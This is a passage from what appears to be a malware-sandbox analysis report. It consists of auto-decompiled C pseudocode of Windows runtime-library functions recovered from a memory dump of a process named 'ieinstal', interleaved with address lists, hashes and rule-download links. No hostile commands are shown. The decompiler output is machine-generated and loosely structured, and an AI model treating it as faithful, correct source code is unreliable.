								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = L2273F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E2271EEF0(0x227f79a0);
									__eflags =  *0x227f8210 - _t104; // 0x68e2e88
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x227f8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										 *((intOrPtr*)(_t95 + 8)) =  *((intOrPtr*)(_t102 + 4));
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											L22784888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E2271EB70(_t95, 0x227f79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											L227495D0();
											L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											L227495D0();
											L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E2271EB70(_t93, 0x227f79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										L227495D0();
										L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t102 + 4)));
										L227495D0();
										L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								_push("true");
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_pop(_t85);
								_v20 = _t85;
								_t87 = L2273F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x227052a5
0x227052ad
0x227052b0
0x227052b3
0x227052b7
0x227052ba
0x227052bf
0x227052c4
0x227052cc
0x00000000
0x00000000
0x227052ce
0x227052d9
0x227052dd
0x227052e7
0x227052f7
0x227052f9
0x227052fd
0x22760dcf
0x22760dd5
0x22760dd6
0x22760dd7
0x22760dd8
0x22760dd9
0x22760dde
0x22760ddf
0x22760de0
0x22760de1
0x22760de2
0x22760de5
0x22760dea
0x22760dec
0x22760f60
0x22760f64
0x22760f70
0x22760f76
0x22760f79
0x22760f79
0x00000000
0x22760f64
0x22760df2
0x22760df7
0x22760e04
0x22760e0d
0x22760e0d
0x22760e10
0x22760e1a
0x22760e1c
0x22760e4c
0x22760e52
0x22760e61
0x22760e67
0x22760e6b
0x22760e70
0x22760e76
0x22760ed7
0x22760edc
0x22760ee0
0x22760ee6
0x22760eea
0x22760eed
0x22760ef0
0x22760ef6
0x22760ef9
0x22760efe
0x22760f01
0x22760f01
0x22760f0b
0x22760f12
0x22760f16
0x22760f18
0x22760f1b
0x22760f2c
0x22760f31
0x22760f31
0x22760f35
0x22760f39
0x22760f3a
0x22760f3c
0x22760f3f
0x22760f50
0x22760f55
0x22760f55
0x22760f59
0x227052eb
0x227052f1
0x227052f1
0x22760e7d
0x22760e84
0x22760e88
0x22760e8a
0x22760e8d
0x22760e9e
0x22760ea3
0x22760ea3
0x22760ea7
0x22760eaf
0x22760eb3
0x22760eb9
0x22760ebc
0x22760ecd
0x22760ecd
0x00000000
0x22760eb3
0x22760e21
0x22760e29
0x22760e2b
0x22760e2f
0x22760e30
0x22760e3a
0x22760e3f
0x22760e41
0x00000000
0x00000000
0x22760e47
0x00000000
0x22760e47
0x22760df9
0x22760dfe
0x00000000
0x00000000
0x00000000
0x22760dfe
0x22705303
0x22705307
0x00000000
0x22705309
0x00000000
0x22705309
0x22705307
0x227052e9
0x227052e9
0x00000000
0x227052e9
0x2270530e
0x00000000

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af7121cb04a73eb306e2f807e2438ec586211d7417ea2b73844706470383a838
Instruction ID: a3d2d97e5f5f0218999796140c4e73f00cdb0ac25374cfbb9b355086910e48ae
Opcode Fuzzy Hash: af7121cb04a73eb306e2f807e2438ec586211d7417ea2b73844706470383a838
Instruction Fuzzy Hash: EA51DF7020D7429FD322CF68C944B67BBE4FF68714F100A1EE89587691E774E948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 22732AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E22732AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x227f8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x227f8208; // 0x227f8207
				_t8 = _t57 + 0x227f8208; // 0x227f8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x227f8450; // 0x69318d6
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x227f821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x227f6d5c; // 0x7fb10654
							_t72 =  *0x227f6d5c; // 0x7fb10654
							_t75 =  *0x227f6d5c; // 0x7fb10654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x227f6d5c; // 0x7fb10654
							_t84 =  *0x227f6d5c; // 0x7fb10654
							_t87 =  *0x227f6d5c; // 0x7fb10654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							L2274F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x22732ae4
0x22732aec
0x22732aef
0x22732af4
0x22732af7
0x22732afd
0x22732b92
0x22732b92
0x22732b97
0x22732b9c
0x22732b9c
0x22732b03
0x22732b06
0x22732b09
0x22732b09
0x22732b0f
0x22732b15
0x22732b15
0x22732b1b
0x22732b1e
0x22732b21
0x22732b26
0x22732b29
0x22732b81
0x22732b84
0x22732c0e
0x22732c15
0x22732c24
0x22732c24
0x22732b8a
0x22732b8a
0x22732b8a
0x22732b8a
0x22732b90
0x00000000
0x00000000
0x00000000
0x00000000
0x22732b4a
0x22732b4a
0x22732b4d
0x22732b53
0x00000000
0x00000000
0x22732b55
0x22732b58
0x22732bb7
0x22775d1b
0x22775d37
0x22775d47
0x22775d53
0x22732bbd
0x22732bbd
0x22732bbd
0x22732bb7
0x22732b5d
0x22732c2f
0x22775d5b
0x22775d77
0x22775d87
0x22775d93
0x22732c35
0x22732c35
0x22732c35
0x22732c2f
0x22732b65
0x22732b9f
0x22732ba2
0x22732b67
0x22732b67
0x22732b69
0x22732b6b
0x22732b6e
0x22732bc9
0x22732bcc
0x22732bcf
0x22732bd4
0x22732bd6
0x22732bd6
0x22732bdb
0x22732c02
0x22732c05
0x22732c07
0x00000000
0x22732c07
0x22732be0
0x22732c00
0x22732c3f
0x22732c3f
0x00000000
0x22732c00
0x22732be5
0x22732be7
0x22732bec
0x22732bf4
0x22732bf6
0x00000000
0x22732bf6
0x22732b70
0x22732b76
0x22732b2b
0x22732b2b
0x22732b2d
0x22732b2f
0x22732b32
0x22732b35
0x22732b3a
0x00000000
0x22732b40
0x22732b43
0x22732b45
0x22732b47
0x22732b4a
0x22732b4d
0x22732b53
0x00000000
0x00000000
0x00000000
0x22732b53
0x22732b78
0x22732b78
0x22732b7b
0x22732b7e
0x00000000
0x22732b7e
0x22732b76
0x22732ba5
0x22732ba5
0x22732ba8
0x22732bad
0x00000000
0x00000000
0x22732baf
0x22732baf
0x22732bc2
0x00000000

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6794590e2c37557a8475341bbc8811e2f206a6100a00c0f3ae48ea9e7209bd44
Instruction ID: 724e9a6e942e075fef5c644494a32e0fb7c53bb8e144cd69a9dc0ae9feb68f6d
Opcode Fuzzy Hash: 6794590e2c37557a8475341bbc8811e2f206a6100a00c0f3ae48ea9e7209bd44
Instruction Fuzzy Hash: BB51F776B08265CFCB15CF2DC8809AEB7B1FB98700711855AEC51EB326E774AE40C790

Uniqueness

Uniqueness Score: -1.00%

Function 2271EF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E2271EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						L22709080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d3c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									L22702D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x2271ef4b
0x2271ef4d
0x2271ef57
0x2271f0bd
0x2271f0c2
0x2271f0d2
0x2271f0d2
0x2271f0c2
0x2271ef5d
0x2271ef5f
0x2271ef67
0x2271ef6a
0x2271ef6d
0x2271ef74
0x2271ef7f
0x2271ef82
0x2271ef82
0x2271ef86
0x2271ef88
0x2271ef8c
0x2271ef8f
0x2271ef8f
0x2271ef8f
0x00000000
0x2271ef91
0x2271ef93
0x2271efc4
0x2271efc4
0x2271efc4
0x2271efca
0x2271efd0
0x2271f0a6
0x00000000
0x00000000
0x2271f0af
0x2276bb06
0x2276bb0a
0x2271f0b5
0x2271f0b5
0x2271f0b5
0x2271f0b5
0x00000000
0x2271efd6
0x2271efd9
0x2271f0de
0x2271f0e2
0x2271efdf
0x2271efdf
0x2271efdf
0x2271efe5
0x2276bafc
0x2276bafc
0x2271efe5
0x2271efeb
0x2271efed
0x2271f00f
0x2271f011
0x2271f01a
0x2271f01d
0x2271f021
0x2271f028
0x2271f029
0x2271f029
0x2271f02c
0x00000000
0x2271f02c
0x2271eff3
0x2271eff9
0x2271f0ea
0x2271f0ed
0x2271f0ef
0x00000000
0x2271f0ef
0x2271f003
0x2276bb12
0x2271f045
0x2271f049
0x2271f051
0x2271f09e
0x2271f0a0
0x2271f0a0
0x2271f09e
0x2271f053
0x2271f064
0x2271f064
0x2271f06b
0x2276bb1a
0x2276bb1a
0x2271f071
0x2271f071
0x2271f07d
0x2271f082
0x2271f08f
0x2271f08f
0x2271f009
0x2271f00d
0x00000000
0x2271f00d
0x2271efd0
0x2271ef97
0x2271efa5
0x2271efaa
0x00000000
0x2271efac
0x2271efac
0x2271efac
0x00000000
0x2271efb2
0x2271f036
0x2271f03a
0x2271f040
0x2271f090
0x00000000
0x2271f092
0x2271f042
0x00000000
0x2271f042
0x2271efb7
0x2271efb9
0x2271efbc
0x2271efb0
0x2271efb0
0x00000000
0x2271efbe
0x2271efbe
0x2271efc1
0x00000000
0x2271efc1
0x2271efbc
0x2271efaa
0x2271ef91

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: b003f514d03c1b00077b224f83f77ff9121aff7267af8d9f46030cc0e2f728ba
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: B351D430E0C349DFDB01CF64C2D0B9EBBF1AF56318F1482A9D94467282C7B5AA89C752

Uniqueness

Uniqueness Score: -1.00%

Function 22718A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E22718A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x227fd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E2274B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					L2271E9C0("true", __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_push("true");
					_pop(_t46);
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x226e1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = L22731DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							L22743C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(L22718999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x22718a0a
0x22718a1c
0x22718a23
0x22718a2e
0x22718a30
0x22718a36
0x22718a3c
0x22718a3e
0x22718a4a
0x22718a52
0x22718a9c
0x22718aae
0x22718a58
0x22718a5e
0x22718a6a
0x22718a6f
0x22718a75
0x22718a7d
0x22718a83
0x22718a85
0x22718a86
0x22718a89
0x22718a93
0x22718a99
0x22718a9b
0x00000000
0x22718aaf
0x22718abe
0x22718ac3
0x22718acb
0x22718ad7
0x22718ae0
0x22718af1
0x00000000
0x22718af1
0x22718acd
0x22718ad5
0x22718afb
0x22718afd
0x22718aff
0x22718b07
0x22718b22
0x22718b24
0x22718b2a
0x22718b2e
0x22718b3f
0x22718b78
0x22718b41
0x22718b52
0x22718b54
0x22718b5c
0x22718b74
0x22718b74
0x22718b5c
0x22718b3f
0x22718b5e
0x22718b61
0x22718b64
0x22718b64
0x22718b6c
0x22718b6c
0x22718b11
0x22769cd5
0x22769cd5
0x22718b17
0x22718b1a
0x22718b1a
0x00000000
0x22718ad5
0x22718a89

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c85e0eb14d18850d496772041c39f18ee5158eb3ba3a0653eafb5f5ebd3b44b
Instruction ID: a61519e2741a8ce2c014406ff618723f5e07b35d44fd448841e0184ae5b37e10
Opcode Fuzzy Hash: 7c85e0eb14d18850d496772041c39f18ee5158eb3ba3a0653eafb5f5ebd3b44b
Instruction Fuzzy Hash: 424162B1A4832C9BEB24CF55CD88BA9B7B4EF54300F5046E9D918A7252E7709E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 22705210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E22705210(intOrPtr _a4, intOrPtr _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				void* _t52;
				intOrPtr _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E227052A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							L227495D0();
							L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E2271EB70(_t54, 0x227f79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								L227495D0();
								L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E2271EB70(_t54, 0x227f79a0);
						}
						return _t52;
					}
					L5:
					_t33 = L2274F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E2271EB70(_t54, 0x227f79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							L227495D0();
							L227277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x22705220
0x22705224
0x22760d13
0x22760d16
0x22760d19
0x2270522a
0x2270522a
0x2270522d
0x2270522d
0x22705231
0x22705235
0x22705239
0x22760d5c
0x22760d62
0x00000000
0x00000000
0x22760d6a
0x22760d7b
0x22760d7f
0x22760d81
0x22760d84
0x22760d95
0x22760d95
0x22760d6c
0x22760d71
0x22760d71
0x22760d9a
0x00000000
0x2270524a
0x2270524a
0x22705250
0x22760d24
0x22760d35
0x22760d39
0x22760d3b
0x22760d3e
0x22760d50
0x22760d50
0x22760d26
0x22760d2b
0x22760d2b
0x00000000
0x22760d55
0x22705256
0x2270525b
0x22705265
0x22760da7
0x2270526b
0x2270526e
0x22705272
0x22760db1
0x22760db4
0x22760dc5
0x22760dc5
0x22705272
0x22705278
0x2270527e
0x2270528a
0x2270528c
0x2270528d
0x00000000
0x22705280
0x22705282
0x22705288
0x2270529f
0x22705292
0x00000000
0x22705292
0x00000000
0x22705288
0x2270527e

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08cc07fb04b764666005d4c3b88fa0956a2ad66d461672a1f8e4ac5e5169cdc3
Instruction ID: d5dda18c7fb854cc8ca7a062c94bf30110f97004dca94364da9e58515d9bc940
Opcode Fuzzy Hash: 08cc07fb04b764666005d4c3b88fa0956a2ad66d461672a1f8e4ac5e5169cdc3
Instruction Fuzzy Hash: 7B31243160DB11EBC7238B29C984F7777A5FF24724F10472AE8591B6A1DB71EE00C690

Uniqueness

Uniqueness Score: -1.00%

Function 2273A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

